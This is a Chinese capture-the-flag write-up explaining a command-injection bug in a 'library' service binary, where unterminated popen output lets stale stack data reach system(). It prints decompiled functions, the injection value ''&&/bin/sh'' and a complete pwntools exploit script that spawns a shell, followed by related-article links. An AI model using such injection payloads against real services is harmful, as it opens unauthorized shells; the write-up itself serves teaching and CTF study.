關(guān)于讀取popen輸出結(jié)果時(shí)未截?cái)嘧址畬?dǎo)致的命令行注入詳解
0x00 前言
這種命令行注入在pwn中出現(xiàn)的比較少,所以記錄分享一下。
0x01 命令行注入介紹
熟悉web安全的話就知道,如果對(duì)特殊字符過濾不當(dāng),會(huì)引發(fā)sql注入或者xss等安全漏洞。其中,命令行注入較為嚴(yán)重,因?yàn)榭梢灾苯幽玫铰┒闯绦虍?dāng)前權(quán)限的OSshell。
然而,命令行注入不僅在web中會(huì)出現(xiàn),在C語言程序中,也會(huì)出現(xiàn)命令行注入的漏洞。比方說這道pwn題,就是調(diào)用system時(shí),沒有對(duì)輸入數(shù)據(jù)進(jìn)行\(zhòng)0截?cái)嘁约皩?duì)特殊字符處理不當(dāng)而導(dǎo)致的。
命令行注入相對(duì)于其他二進(jìn)制漏洞相比利用比較簡(jiǎn)單,比方說這道題,舉個(gè)例子:
sprintf(&s, "du -sh lib/'%s'", v6); system(&s);
其中設(shè)計(jì)初衷,v6應(yīng)當(dāng)是一個(gè)合法的文件名。但是如果攻擊者惡意操控v6,比方說,讓v6為:'&&/bin/sh'
進(jìn)行sprintf拼接后,system所執(zhí)行的命令為:
du -sh lib/''&&/bin/sh''
這里有兩個(gè)linux命令行的知識(shí):
&&,這是拼接兩個(gè)命令,如果我們執(zhí)行 command1&&command2,那么等價(jià)于先執(zhí)行command1在執(zhí)行command2。其中命令跟&&之間不必加空格。
在命令后不加空格的''(兩個(gè)單引號(hào))會(huì)被忽略,比如ls''等價(jià)于ls,/bin/sh''等價(jià)于/bin/sh,du -sh lib/''等價(jià)于du -sh lib/(即,實(shí)際傳進(jìn)去的參數(shù)是lib/不是lib/'')
所以,執(zhí)行上面的命令,相當(dāng)于先執(zhí)行了
du -sh lib/
再執(zhí)行
/bin/sh
所以,可以getshell。
0x02 題目
題目所給的是一個(gè)library的服務(wù),可以上傳book,查看books,清除books。其中,book存放在lib/文件夾中。
0x03 漏洞點(diǎn)
char *list_books() { FILE *v0; // eax char *result; // eax char s; // [esp+4h] [ebp-C14h] char ptr; // [esp+804h] [ebp-414h] char *v4; // [esp+C04h] [ebp-14h] FILE *stream; // [esp+C08h] [ebp-10h] char *v6; // [esp+C0Ch] [ebp-Ch] v0 = popen("ls lib/", "r"); stream = v0; result = (char *)fread(&ptr, 1u, 0x400u, v0); v4 = result; if ( result ) { v6 = strtok(&ptr, delims); result = (char *)send("Book list:\nSize\tE-book\n"); while ( v6 ) { sprintf(&s, "du -sh lib/'%s'", v6); //很明顯,這里存在可能的命令行注入 system(&s); fflush(stdout); result = strtok(0, delims); v6 = result; } } return result;
其中l(wèi)ist_books代碼如上,v6來自fread從popen中的返回結(jié)果。他本來想做的是輸出每個(gè)文件的大小,但是fread后沒有用\0截?cái)?。所以調(diào)用strtok時(shí),可能會(huì)讀到fread后面的垃圾數(shù)據(jù)(當(dāng)然如果可以操控的話就不是垃圾數(shù)據(jù)了)
sprintf的棧溢出會(huì)比較難利用,因?yàn)?amp;s比較大,有0x800,而v6是從&ptr里面strtok出來的,而&ptr更小,只有0x400。所以應(yīng)該沒法很好的利用。
0x04 操控垃圾數(shù)據(jù)
那么,我們?cè)趺慈ゲ倏?amp;ptr中的垃圾數(shù)據(jù)呢?這個(gè)時(shí)候看看另外一個(gè)函數(shù)
int upload_book() { char *v1; // eax int v2; // eax char buf[1024]; // [esp+Ch] [ebp-42Ch] char s[20]; // [esp+40Ch] [ebp-2Ch] FILE *stream; // [esp+420h] [ebp-18h] char *dest; // [esp+424h] [ebp-14h] size_t v7; // [esp+428h] [ebp-10h] int v8; // [esp+42Ch] [ebp-Ch] if ( book_counter > 10 ) return send("too many books\n"); send("Book filename: "); v8 = __isoc99_scanf("%20s", s); if ( v8 != 1 ) return send("Wrong title format\n"); v7 = strlen(s); if ( strcmp(&s[v7 - 3], ".bk") ) return send("The name needs to end with '.bk'\n"); send("e-book contents: \n"); read(0, buf, 0x400u); if ( *(_DWORD *)buf != 'BBBB' ) return send("Not an e-book\naborting...\n"); v1 = (char *)malloc(0x18u); dest = v1; *(_DWORD *)v1 = 0x2F62696C; v1[4] = 0; strcat(dest, s); stream = fopen(dest, "w"); if ( !stream ) return send("Bad book filename\n"); v2 = book_counter++; books[v2] = dest; fwrite(buf, 1u, 0x400u, stream); return fclose(stream); }
其中,這在棧中也會(huì)分配0x400個(gè)字節(jié),并且我們可以寫入。
并且,調(diào)用完這個(gè)函數(shù)之后,清除??臻g時(shí),只是簡(jiǎn)單地add esp,xxx,并不會(huì)清空其中數(shù)據(jù)。然后,再調(diào)用存在命令行注入的函數(shù)并分配??臻g時(shí),也只是單純地sub esp,xxx,也不會(huì)清空數(shù)據(jù)。在C語言中,如果此時(shí)對(duì)不賦值的局部變量直接訪問的話,是UB行為。但是,從二進(jìn)制安全的角度看的話,便是可利用的點(diǎn)了。其中這道題,本身就是一個(gè)局部字符串讀取后未截?cái)喽斐傻腢B,然而我們便可以利用這個(gè)。
那么來試試:
很明顯,BBBB123456789123456789123456789123456789AAAA的后面89123456789AAAA被拼接到du -sh lib/'%s'中了
動(dòng)態(tài)調(diào)試看一下的話
第一次在system停下
第二次在system停下
所以很明顯,只要把89123456789AAAA改成
'&&/bin/sh'\x00
就可以getshell了。如前面所說。
其中,\x00是我們自己手動(dòng)截?cái)?,不然strtok還會(huì)繼續(xù)往后讀。
所以最后exp
#BBBB1234567891234567891234567'&&/bin/sh' g_local = True from pwn import * if g_local: sh=process("./library") else: sh=remote("xxxx",1234) def upload_book(filename, content): filename += ".bk" sh.send("1\n") sh.recvuntil("Book filename: ") print filename sh.send(filename + "\n") sh.recvuntil("e-book contents: \n") sh.send(content) sh.recvuntil("Enter command: ") def list_books_and_shell(): sh.send("2\n") sh.interactive() upload_book("1", "BBBB1234567891234567891234567\'&&/bin/sh\'\x00") list_books_and_shell()
0x05 后言
還有一點(diǎn)要注意,pwndbg好像會(huì)默認(rèn)在fork時(shí)跟子進(jìn)程,所以要在~/.gdbinit的最后面(加載pwndbg之后)加上set follow-fork-mode parent。并且,&&與命令之間不能加空格。因?yàn)樗鹲trtok是通過空格和換行分?jǐn)嘧址?,加了空格我們的payload就會(huì)被strtok分割開。
總結(jié)
以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問大家可以留言交流,謝謝大家對(duì)腳本之家的支持。
相關(guān)文章
C語言之把數(shù)組名作函數(shù)參數(shù)的四種情況說明
這篇文章主要介紹了C語言之把數(shù)組名作函數(shù)參數(shù)的四種情況說明,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2022-07-07Windows下sentry接入C/C++程序的詳細(xì)過程
sentry作為一個(gè)開源的軟件,發(fā)展至今,已經(jīng)非常成熟。它支持的平臺(tái)眾多,甚至于針對(duì)不同的工作者(后臺(tái)、前端、客戶端)都有相應(yīng)的內(nèi)容,這篇文章主要介紹了Windows下sentry接入C/C++程序,需要的朋友可以參考下2022-09-09C/C++判斷傳入的UTC時(shí)間是否當(dāng)天的實(shí)現(xiàn)方法
在項(xiàng)目中經(jīng)常會(huì)顯示一個(gè)時(shí)間,如果這個(gè)時(shí)間在今日內(nèi)就顯示為時(shí)分秒,否則顯示為年月日,有需要的朋友可以參考一下2014-01-01C語言之實(shí)現(xiàn)單鏈表指定結(jié)點(diǎn)的插入方式
這篇文章主要介紹了C語言之實(shí)現(xiàn)單鏈表指定結(jié)點(diǎn)的插入方式,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2022-07-07C++ Boost Fusion創(chuàng)建異構(gòu)容器詳解
Boost.Fusion 使創(chuàng)建異構(gòu)容器成為可能。例如,您可以創(chuàng)建一個(gè)向量,其第一個(gè)元素是 int,第二個(gè)元素是字符串。此外,Boost.Fusion 提供了處理異構(gòu)容器的算法。您可以將 Boost.Fusion 視為異構(gòu)容器的標(biāo)準(zhǔn)庫2022-11-11C語言每日練習(xí)之動(dòng)態(tài)顯示系統(tǒng)時(shí)間
這篇文章主要介紹了C語言動(dòng)態(tài)顯示系統(tǒng)時(shí),文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧2021-11-11C++實(shí)現(xiàn)基于時(shí)序公平的讀寫鎖詳解
讀寫鎖與普通的互斥鎖的區(qū)別在于有兩種上鎖方式:讀鎖和寫鎖,不用的用戶對(duì)同一個(gè)讀寫鎖獲取讀鎖是非互斥的,其他情況則是互斥的,本文小編將給大家詳細(xì)介紹C++實(shí)現(xiàn)基于時(shí)序公平的讀寫鎖,需要的朋友可以參考下2023-10-10